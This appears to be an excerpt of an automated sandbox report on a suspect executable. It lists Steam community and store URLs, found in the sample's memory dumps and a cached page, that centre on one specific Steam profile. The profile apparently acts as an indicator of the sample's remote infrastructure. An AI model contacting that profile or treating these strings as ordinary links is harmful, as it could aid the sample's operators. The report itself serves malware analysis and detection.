Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2523079878.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/O
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158701054.0000000000A41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/P
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr String found in binary or memory: https://steamcommunity.com/discussions/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199804377619[1].htm0.14.dr String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199804377619
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr String found in binary or memory: https://steamcommunity.com/market/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/o
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000000.1785190377.000000000045C000.00000008.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe.0.dr String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837734458.0000000000A46000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619#
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837734458.0000000000A46000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619/badges
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619/inventory/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619?
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619E
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619G
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619_
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2523079878.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619com
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619i
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe.0.dr String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619p1up1Mozilla/5.0
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619stea%
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.00000000009CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619tlq
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr String found in binary or memory: https://steamcommunity.com/workshop/
Source: 76561199804377619[1].htm0.14.dr String found in binary or memory: https://store.steampowered.com/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;)
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837734458.0000000000A78000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;a(
Source: 76561199804377619[1].htm0.14.dr String found in binary or memory: https://store.steampowered.com/about/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr String found in binary or memory: https://store.steampowered.com/explore/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748291843.0000000000193000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/leg
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr String found in binary or memory: https://store.steampowered.com/legal/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr String found in binary or memory: https://store.steampowered.com/mobile
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr String found in binary or memory: https://store.steampowered.com/news/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr String found in binary or memory: https://store.steampowered.com/points/shop/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr String found in binary or memory: https://store.steampowered.com/stats/
